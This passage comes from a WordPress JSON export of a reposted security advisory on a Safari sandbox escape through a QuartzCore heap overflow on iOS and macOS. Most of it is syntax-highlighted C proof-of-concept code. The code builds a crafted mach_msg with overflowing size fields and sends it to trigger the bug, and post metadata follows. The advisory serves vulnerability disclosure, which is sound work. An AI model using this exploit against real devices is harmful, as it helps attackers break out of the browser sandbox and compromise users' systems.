class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40002<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-93\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Ports count<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/**<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-98\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t1. One port consumes 12B space<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-99\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t2. This `mach_msg` routine dose not need a port, so set this port to MACH_PORT_NULL(memory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-100\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t&nbsp;&nbsp; cleared by memset)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-101\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-102\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdeadbeef<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn_id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">int8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint64_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdeadbeefdeadbeef<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-108\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x12<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Decode Function<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/**(uint32_t*)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0xDECAFBAD;*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint64_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x2000000000000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-116\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_SEND_MSG<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TIMEOUT_NONE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] Send message failed: %sn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-125\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-127\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_int_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-130\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0169 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3796\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Sun, 02 Dec 2018 13:08:59 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary QuartzCore ( https:\/\/developer.apple.com\/documentation\/quartzcore ), also known as CoreAnimation, is a framework use by macOS and iOS to build an animatable scene graph. CoreAnimation uses a unique rendering model where the graphics operations are run in a separate process. On macOS, the process is WindowServer and on iOS the name is backboardd. Both of &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3796\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 iOS\/macOS Safari Sandbox Escape via QuartzCore Heap Overflow<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12357,15244,10757],"class_list":["post-13976","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-heap-overflow","tag-sandbox-escape","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13976"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13976\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13976"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}